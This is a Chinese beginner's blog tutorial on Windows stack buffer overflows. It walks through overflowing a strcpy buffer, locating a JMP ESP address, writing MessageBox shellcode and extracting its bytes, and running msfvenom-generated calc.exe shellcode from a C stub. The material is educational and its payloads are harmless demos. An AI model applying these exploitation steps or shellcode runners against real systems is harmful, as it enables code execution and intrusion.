网络安全(超级详细)零基础带你一步一步走进缓冲区溢出漏洞和shellcode编写!...

最新推荐文章于 2023-03-14 10:19:31 发布
最新推荐文章于 2023-03-14 10:19:31 发布
阅读量707 收藏 8
点赞数 2
分类专栏: 网络安全 文章标签: shellcode 网络安全 零基础 缓冲区溢出 metasploit
微信搜索桔子科研,关注并领取更多有趣的源码。
本文链接:https://blog.csdn.net/qq_41482054/article/details/90706234
版权

网络安全(超级详细)零基础带你一步一步走进缓冲区溢出漏洞和shellcode编写!

 

零基础带你走进缓冲区溢出,编写shellcode

写在前面的话:本人是以一个零基础者角度来带着大家去理解缓冲区溢出漏洞,当然如果你是开发者更好。

注:如果有转载请注明出处!创作不易、谢谢合作。

0、环境搭建

本次实验所用到的工具有:

x32dbg:一个基于qt开发的、开源调试器。

 

ghidra:美国NSA国家安全局用的反汇编静态分析工具。如果你对IDA熟悉也可以用IDA。(链接在国内无法访问,怎么访问你懂的。)

 

visual C++ 6.0:一个微软的编译器。用其他的C++编译器只要取消编译优化即可。

 

1、一个有漏洞的小程序:

在C语言里面的string标准库中,有这么一个著名的strcpy函数,这个strcpy函数的作用就是将字符串数组拷贝到指定的位置。

但是,再拷贝之前并没有对字符串的长度进行检测!!

如果这个字符串过长的话就会覆盖相邻的内存。造成缓冲区栈溢出!

我们的这个漏洞小程序如下所示:

#include "stdio.h"
#include "string.h"
char payload[] = "aaaaaaaa";
int main()
{
 char buffer[8];
 strcpy(buffer, payload);
 printf("%s",buffer);
 getchar();
 return 0;
}

功能很简单,就是将payload中的字符串拷贝进buffer数组中,并打印出来。

注意此时buffer的大小为8.

运行结果如下。

 

程序完美运行,但是这个程序真的没问题吗?

 我们接着往下看:

2、字符串长了!

代码如下所示:

#include "stdio.h"
#include "string.h"
char payload[] = "aaaaaaaaEBPX";
int main()
{
 char buffer[8];
 strcpy(buffer, payload);
 printf("%s",buffer);
 getchar();
 return 0;
}

在这里我们加长了payload的长度,大家可以看到,程序还是完美的运行了,。

因为笔者的电脑是Win10系统,因此系统不会给你进行报错,而是智能的进行了异常处理。所以我们接下来进入调试环节!

首先我们用ghidra打开我们刚才写好的程序。

找到我们刚才定义函数在传递参数的时候如下:

 

 

 

 

 

不懂汇编没事。你只要看到push 一堆东西,+call 一个东西,那就是在调用函数!

看到了具体的调用位置,我们打开x32dbg 然后定位到该地址进行分析。

 

 

 

 

这里我们跳到call的位置,然后用F9执行到这里。

 

注意此时箭头所指的俩个位置

上面的所指的是父函数的EBP地址。

下面所指的就是函数要返回的地址。

这时我们让程序继续执行。

当我们单步执行过之后,我们会发现,这个程序因为缓冲区被冲破,所以父函数EBP被覆盖了,也就是造成了缓冲区溢出。

那么我们需要思考,是否可以把字符串加长,然后把返回地址给覆盖了呢?答案当然是可以的。

这样的话,程序就会执行我们的代码了!

但是如何把我们想执行的代码递给程序执行呢?

三、JMP_ESP方法编写shellcode

思路:我们需要寻找电脑中可利用的动态链接库中可以用的指令,这样的话,我们就可以执行我们想要的指令了。

但是这种指令不一定适合我们,如果没有对应的函数怎么办

这时候有个非常出名的方法,叫JMP_ESP,他会执行栈中的代码,也就是说我们只要把shellcode放在字符串内就行。

首先我们需要在电脑中寻找JMP_ESP函数!

代码如下:

#include <windows.h>
#include <stdio.h>
#include <stdlib.h>

int main()
{
        BYTE *ptr;
        int position;
        HINSTANCE handle;
        BOOL done_flag = FALSE;
        handle = LoadLibrary("user32.dll");
        if(!handle)
        {
                printf("load dll error!");
                exit(0);
        }
        ptr = (BYTE*)handle;

        for(position = 0; !done_flag; position++)
        {
                try
                {
                        if(ptr[position]==0xFF && ptr[position+1]==0xE4)
                        {
                                int address = (int)ptr + position;
                                printf("OPCODE found at 0x%x\n", address);
                        }
                }
                catch(...)
                {
                        int address = (int)ptr + position;
                        printf("END OF 0x%x\n", address);
                        done_flag = true;
                }
        }
  getchar();
        return 0;
}

运行结果如上,我们随便挑选一个地址即可使用。

 

 因为我们需要可视化的效果,所以我们挑选一个弹出一个对话框的方法来使我们可视化。

弹窗地址寻找的代码如下:

#include<windows.h>
#include<stdio.h>
typedef void (*MYPROC)(LPTSTR);
int main(){
    HINSTANCE LibHandle;
    MYPROC ProcAdd;
    LibHandle = LoadLibrary("user32");
    printf("user32 = 0x%x\n",LibHandle);
    ProcAdd=(MYPROC)GetProcAddress(LibHandle,"MessageBoxA");
    printf("MessageBoxA = 0x%x\n",ProcAdd);
    getchar();
    return 0;
}

运行结果如下:

接下来我们要寻找能使程序正常退出的函数,代码如下:

#include<windows.h>
#include<stdio.h>
typedef void (*MYPROC)(LPTSTR);
int main(){
    HINSTANCE LibHandle;
    MYPROC ProcAdd;
    LibHandle = LoadLibrary("kernel32");
    printf("kernel32 = 0x%x\n",LibHandle);
    ProcAdd=(MYPROC)GetProcAddress(LibHandle,"ExitProcess");
    printf("ExitProcess = 0x%x\n",ProcAdd);
    getchar();
    return 0;
}

运行结果如下:

 

四、使用x64dbg提取shellcode

笔者在这里挑选三个地址为:

jmp esp: 0x74a99be9 //JMP ESP 使EIP跳转到shellcode执行
msgbox: 0x74991f70 //shellcode执行弹出对话框
exitprocess:0x75cd4b80 //使程序正常退出

在这里我是用内联汇编的方法来编写shellcode

代码如下:

#include "windows.h"
int main(){
    LoadLibrary("user32.dll");     //因为调用了user32中的函数,所以需要加载user32,之所以选择user32加载是因为几乎所有win32应用都会加载这个库。
    _asm{             //内联汇编
        sub esp,0x50    //为了使 shellcode 具有较强的通用性,我们通常会在 shellcode 一开始就大范围抬高栈顶,把 shellcode“藏”在栈内,从而达到保护自身安全的目的
        xor ebx,ebx    //将ebx清0
        push ebx        //ebx入栈
        push 0x2020206f
        push 0x6c6c6568   //push "hello" 字符串的ascii码当作标题  小端书写  push的时候不够的话用20填
        mov eax,esp    //将hello标题赋给eax
        push ebx        //ebx压栈   将俩个字符串断开
        push 0x2020206f
        push 0x6c6c6568   //push "hello" 字符串当作内容
        mov ecx,esp    //将内容赋给ecx

        push ebx    //messagebox 的第4个参数
        push eax    //messagebox 的第3个参数
        push ecx  //messagebox的第2个参数
        push ebx  //messagebox的第1个参数

        mov eax,0x74991f70 //msg
        call eax    //调用msg

        push ebx    //向栈内压入0
        mov eax,0x75cd4b80 //将exit函数地址赋给eax
        call eax//调用exit函数
    }
    return 0;
}

然后用x64dbg打开后结果如下:

 

 提取后如下:

0040103C | 83EC 50                  | sub esp,50                              |
0040103F | 33DB                     | xor ebx,ebx                             |
00401041 | 53                       | push ebx                                |
00401042 | 68 6F202020              | push 2020206F                           |
00401047 | 68 68656C6C              | push 6C6C6568                           |
0040104C | 8BC4                     | mov eax,esp                             |
0040104E | 53                       | push ebx                                |
0040104F | 68 6F202020              | push 2020206F                           |
00401054 | 68 68656C6C              | push 6C6C6568                           |
00401059 | 8BCC                     | mov ecx,esp                             | ecx:EntryPoint
0040105B | 53                       | push ebx                                |
0040105C | 50                       | push eax                                |
0040105D | 51                       | push ecx                                | ecx:EntryPoint
0040105E | 53                       | push ebx                                |
0040105F | B8 701F9974              | mov eax,74991F70                        |
00401064 | FFD0                     | call eax                                |
00401066 | 53                       | push ebx                                |
00401067 | B8 804BCD75              | mov eax,<kernel32.ExitProcess>          |
0040106C | FFD0                     | call eax                                |

我们去掉乱八七糟的东西后,进行整理如下:

\x33\xDB
\x53
\x68\x6F\x20\x20\x20
\x68\x68\x65\x6C\x6C
\x8B\xC4
\x53
\x68\x6F\x20\x20\x20
\x68\x68\x65\x6C\x6C
\x8B\xCC
\x53
\x50
\x51
\x53
\xB8\x70\x1F\x99\x74
\xFF\xD0
\x53
\xB8\x80\x4B\xCD\x75
\xFF\xD0

然后我们加上引号

"\xe9\xe5\xa9\x74"
"\x33\xDB"
"\x53"
"\x68\x6F\x20\x20\x20"
"\x68\x68\x65\x6C\x6C"
"\x8B\xC4"
"\x53"
"\x68\x6F\x20\x20\x20"
"\x68\x68\x65\x6C\x6C"
"\x8B\xCC"
"\x53"
"\x50"
"\x51"
"\x53"
"\xB8\x70\x1F\x99\x74"
"\xFF\xD0"
"\x53"
"\xB8\x80\x4B\xCD\x75"
"\xFF\xD0"

OK!大功告成!

五、程序运行结果!

完整程序代码如下:

#include<stdio.h>
#include<windows.h>
char payload[]="aaaaaaaaebxx\xe9\xe5\xa9\x74\x33\xDB\x53\x68\x6F\x20\x20\x20\x68\x68\x65\x6C\x6C\x8B\xC4\x53\x68\x6F\x20\x20\x20\x68\x68\x65\x6C\x6C\x8B\xCC\x53\x50\x51\x53\xB8\x70\x1F\x99\x74\xFF\xD0\x53\xB8\x80\x4B\xCD\x75\xFF\xD0";
int main()
{
 LoadLibrary("user32.dll");
 char buffer[8];
 strcpy(buffer,payload);
 printf("%s",buffer);
 getchar();
 return 0;
}

执行后如下所示:

六、如何0基础几分钟学会编写shellcode?

使用msf即可。把这个代码记着就会了(笑)。

msfvenom -p windows/exec cmd=calc.exe -f c

体验下~:

unsigned char buf[] = 
"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
"\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52"
"\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1"
"\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b"
"\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03"
"\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b"
"\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24"
"\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb"
"\x8d\x5d\x6a\x01\x8d\x85\xb2\x00\x00\x00\x50\x68\x31\x8b\x6f"
"\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5"
"\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a"
"\x00\x53\xff\xd5\x63\x61\x6c\x63\x2e\x65\x78\x65\x00";
int main()
{    
    _asm{
        lea eax,buf
            push eax
            ret
    }
    return 0;
}

执行后如上所示。

 

 

 

PS:笔者在B站做了一次完整的视频!如下操作均可在https://www.bilibili.com/video/av48022107

这里看到!码字不易!希望大家能够喜欢!

posted @ 2019-05-09 12:16 godoforange 阅读(...) 评论(...) 编辑 收藏

秃桔子
关注
  • 2
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
Q版缓冲区溢出教程.doc
09-27
Q版缓冲区溢出教程.doc 第一章、Windows下堆栈溢出入门.....................................8 1.1 梦,已经展开 ........................................................ 8 1.2 啤酒和杯子――缓冲区溢出原理......................................... 8 1.3 神秘的Windows系统.................................................. 10 1.4 ShellCode编写简介 .................................................. 17 1.5 窥豹一斑――本地缓冲区溢出简单利用.................................. 21 1.6 小结——摘自小强的日记.............................................. 28 1.7 首次实战――FoxMail溢出漏洞编写 .................................... 29 1.8 牛刀小试――Printer溢出漏洞编写 .................................... 41 1.9 JMP /CALL EBX——另一种溢出利用方式................................. 42 1.10 拾阶而上——IDA/IDQ溢出漏洞编写 ................................... 55 课后解惑 ................................................................ 58 第二章、Windows下ShellCode编写初步..............................60 2.1 ShellCode是什么? .................................................. 60 2.2 简单的例子——编写控制台窗口的ShellCode............................. 63 2.3 ShellCode通用性的初步分析 .......................................... 78 2.4 弹出Windows对话框ShellCode编写.................................. 82 2.5 添加用户ShellCode编写............................................ 88 课后解惑 ................................................................ 98 第三章、后门的编写ShellCode的提取 ............................100 3.1 预备知识 .......................................................... 101 3.2 后门总体思路 ...................................................... 121 3.3 Telnet后门的高级语言实现 .......................................... 125 3.4 生成ShellCode ..................................................... 136 3.5 进一步的探讨 ...................................................... 156 3.6 反连后门ShellCode编写........................................... 160 课后解惑 ............................................................... 166 第四章 Windows下堆溢出利用编程..................................168 4.1 堆溢出初探 ......................................................... 168 4.2 RtlAll
课程10-缓冲区溢出Shellcode1
08-03
3. 网络信息收集技术 4. 网络嗅探与协议分析 5. TCP/IP网络协议攻击 6. 网络安全防护技术 7. 系统安全攻防: Windows 8. 系统安全攻
shellcode 编写技术 缓冲区溢出教程
04-20
shellcode 编写技术 缓冲区溢出教程
详解缓冲区溢出-ShellCode提取等
08-22
这算是比较详细的讲解缓冲区溢出攻防等利用手段 从入门到精通 我相信看完后 哪怕对缓冲区溢出闻所未闻的人 也能成为一个高手 个中意识及生动的讲解方式 课后练习等~~ 相对这方面的知识网上还很少 而且入门级的就更少了 这里忍疼风险出来 需要的账户和密码已经打包在压缩文件中
【网络资源学习笔记】ShellCode相关内容学习
天在等我,菜鸟想飞
07-14 1948
个人shellcode相关网络资源学习记录
msf生成的shellcode分析--走,组团分析shellcode
m0_64973256的博客
05-11 882
作者丨selph 分析MSF Windows/exec Shellcode 最近分析漏洞用到msf生成的样本进行测试,其中用到payload选项为Windows/exec cmd="calc.exe"的这个payload,本着一定要知道利用代码是怎么运行的想法,开始对该shellcode详细分析。 实验环境 •虚拟机:Kali Linux 2022.1 x64 •物理机:Windows 10 21H2 家庭版 •软件:x86...
Python免杀脚本生成.exe(过火绒过联想没过360)
sGanYu
04-06 3772
方法:使用内存加载shellcode msfvenom -p windows/x64/exec CMD='calc.exe' -f py -b '\x00\x0a' 【这里执行弹出计算器的命令操作】 -p 用于指定payload calc.exe用于执行弹出计算机操作 -f 用于指定生成的shellcode的编译语言 -b 用于禁止生成shellcode中易出现的被查杀软件检测的字符串 -e 可以选择相应的编码器 在pycharm内运行如下脚本 import ctypes from.
渗透工具之msf
热门推荐
rentian1的博客
03-30 4万+
转载自 csdn:忆蓉之心 简介 它是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附数百个已知软件漏洞的专业级漏洞攻击工具。 环境 工具:msf4 伪装木马 原理:msfvenom是msfpayload,msfencode的结合体,它的优点是单一,命令行,和效率.利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线。 构造...
[Windows] 缓冲区溢出漏洞实验和补丁程序编写
PlanetRT的博客
12-19 1291
[Win] 缓冲区溢出漏洞实验和补丁程序 题目描述 文件列表: SSEx.exe : 编译生成的可执行文件 已知所给的代码中存在安全漏洞 请找到导致漏洞的代码 分析漏洞的成因 给出一种成功的利用:显示信息“eXploited!” 修复该漏洞 撰写详细的分析利用报告 题目文件百度网盘链接:link 提取码:fwle 分析环境 操作系统 Windows 10 C/C++ IDE Visual Studio 2019 反编译工具 IDA Pro 64-bit 十六进制编辑器 WinH
编写自己的缓冲区溢出利用程序
lile269的专栏
06-02 1295
<br />编写自己的缓冲区溢出利用程序<br />内容: 本文主要讲解有关Buffer Overflow的原理, 以及结合实战范例介绍linux和Solaris下的漏洞利用. <br />本文并不介绍如何编写shell code. <br />要求: 读者要有一点C和汇编语言基础. <br />目标: 希望本文能够尽量做到通熟易懂,使得稍有计算机基础知识的朋友看后能够亲自动手写自己的EXPloit <br />假如你觉得自己对这些都懂了, 就请不要再往下看了. <br /><br />第一部份 概述篇 <
缓冲区溢出利用实验(详细步骤)
02-23
由于程序的运行机制,假设利用 strcpy()函数进行字符串赋值,因定义的字符 串及输入字符串长度不一致或过长,从而占用了 ebp(栈底)和 call(函数)返回地址的栈 区。基于此可利用修改的函数调用结束后的返回地址...
零基础小白该如何入门网络安全
m0_74942241的博客
02-23 225
作为在网络安全行业工作了近10年,各种岗位都做过一遍的**“资深程序员”**来告诉你,网络安全不难,网络安全入门更简单!可不要被它神秘的外衣给唬住了。只要你接下来认真听完我的讲解,虽然保证不了你能成为大神,但就算你学习能力再差。进入正题说白了,网络安全就是指网络系统中的数据受到保护不被破坏。而我们从事网络信息安全工作的安全工程师,主要工作当然是设计程序来维护网络安全了。
零基础毫无经验该如何入门学习网络安全
Y525698136的博客
03-14 124
学习网络至少要先知道http/https抓包后能读懂是什么意思,然后就可以开始入手web安全。
这才是CSDN最系统的网络安全学习路线(建议收藏)
kali_Ma的博客
09-13 1万+
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web 安全技术,既有 Web 渗透,也有 Web 防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。给小伙伴们的意见是想清楚,自学网络安全没有捷径,相比而言系统的网络安全是最节省成本的方式,因为能够帮你节省大量的时间和精力成本。
[pwnable.tw] Start Write up
yym68686
02-18 141
Start checksec Arch: i386-32-little RELRO: No RELRO Stack: No canary found NX: NX disabled PIE: No PIE (0x8048000) 程序只有两个函数 _start _exit _start函数 .text:08048060 push esp # 将esp寄存器的值压入栈中,程序一开始什么都没有,esp就是栈顶 .text:080
显示十六进制字符数组
dianyin8310的博客
07-04 362
1. 将一串十六进制数值,保存到字符数组中,然后以16进制显示。 unsigned char buf[5] ="\x8B\x22\x11\x12"; //结尾\0 CString str; for(int i=0;i<4;i++){ CString s; s.Format("%x ",buf[i]); str += s; } AfxMessageBox(st...
C:数据相关操作
FristLineCode的博客
05-12 247
C数据相关操作
x64dbg调试器使用
Mr.zhang的博客
06-26 3371
x64dbg调试器使用x64dbg调试器x64dbg基本功能控制软件运行查看软件运行中信息修改软件执行流程x64dbg调试器的使用测试程序使用步骤打开软件软件下载 x64dbg调试器 相信很多大学生学习写程序,都是通过编译器将写的程序经过编译之后生成可执行文件.exe(windows),博主当时也是这么一个经历,很少会想过如何通过.exe文件来查看以及了解自己写的程序是如何运行,之后了解到一款软件OD OD,是一个反汇编工具,又叫OllyDebug,一个新的动态追踪工具,将IDA与SoftICE结合起来的思
x64dbg 2022 最新版编译方法
CSDN
09-09 6667
x64dbg 调试器的源码编译很麻烦,网络上的编译方法均为老版本,对于新版本来说编译过程中会出现各种错误,编译的坑可以说是一个接着一个,本人通过研究总结出了一套编译拳法可以完美编译输出,不过话说回来x64dbg这种使用两个编译器开发的方式以及调用太多的第三方项目想要完全编译其实也是非常困难的,如下笔记只提供编译x64dbg本体,并确保其能够正常运行。此时的x32dbg是无法运行的,因为缺少dll动态链接库,这些动态库每一个都需要单独编译,工程量是巨大的,此处我就直接拷贝编译好的。此时切换到主目录,并执行。
缓冲区溢出攻击shellcode
最新发布
09-19
缓冲区溢出攻击是一种利用程序缓冲区溢出漏洞的攻击方式,通过向程序输入超出缓冲区大小的数据,覆盖程序的内存空间,从而控制程序的执行流程。Shellcode是一段用于执行特定操作的机器码,通常用于利用缓冲区溢出...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值